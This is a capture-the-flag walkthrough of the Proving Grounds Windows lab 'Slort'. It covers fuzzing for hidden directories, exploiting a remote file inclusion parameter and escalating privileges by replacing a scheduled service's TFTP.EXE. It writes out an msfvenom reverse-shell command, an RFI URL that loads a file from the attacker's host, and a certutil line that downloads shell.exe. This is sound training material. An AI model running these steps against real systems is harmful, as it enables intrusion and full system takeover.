Slort

Source: Proving Grounds OS: Windows Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started as usual with autorecon which exposed: FTP (21), 135, 139, 445, 3306, HTTP (4443), 5040, HTTP (8080), 49664 -> 49669

Service Analysis

  • FTP had no anonymous access so I started with the usual, HTTP. Both HTTP sites were XAMPPโ€™s default page. Access to phpMyAdmin was denied, displaying the message:

XAMPP Default Page
Access Forbidden

  • I checked the fuzzers but they exposed nothing, and neither SMB nor MySQL provided anything useful. I kept going in circles for a bit until I fuzzed the sites again with a different wordlist:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://192.168.213.53:4443:/FUZZ

  • Thatโ€™s when "/site/" was exposed. This directory contained a simple PHP page with the URL: http://192.168.213.53:4443/site/index.php?page=main.php Iโ€™m sure if I were in an anime, a light bulb would have appeared with the text "File Inclusion" flashing before my eyes.

site Directory

Gaining Initial Access

  • I tested the inclusion by visiting: http://192.168.213.53:4443/site/index.php?page=..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts which worked!

LFI Check

  • When facing a file inclusion vulnerability, itโ€™s important to check whether itโ€™s Remote File Inclusion (RFI) or only Local File Inclusion. Turns out we have RFI and that was it, we were able to get a shell!

  • I generated a reverse shell payload with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=8178

  • Then triggered it via the vulnerable parameter: http://192.168.213.53:4443/site/index.php?page=http://192.168.45.170:901/shell.php

Reverse Shell

Privilege Escalation

  • Once I was in, I uploaded winPEAS and started checking around. The C drive had a Backup directory, and inside I found a file, info.txt, containing:

info.txt Content

  • This indicated a scheduled service (the Windows equivalent of cron jobs). I decided to see if I had permission over the directory. I performed the following steps:

move TFTP.EXE TFTP_old.EXE
certutil -urlcache -split -f http://192.168.45.170:901/shell.exe
move shell.exe TFTP.EXE

  • There we go, we got a shell back as an admin.

Privilege Escalation

Lessons Learned

  • Fuzzing with alternative wordlists can reveal hidden directories when initial scans turn up nothing.

  • File inclusion vulnerabilities can sometimes allow Remote File Inclusion, granting a quick path to a shell.

  • Scheduled tasks or services that run binaries from writable directories are valuable privilege escalation vectors.

PreviousNickelNextMedJed

Last updated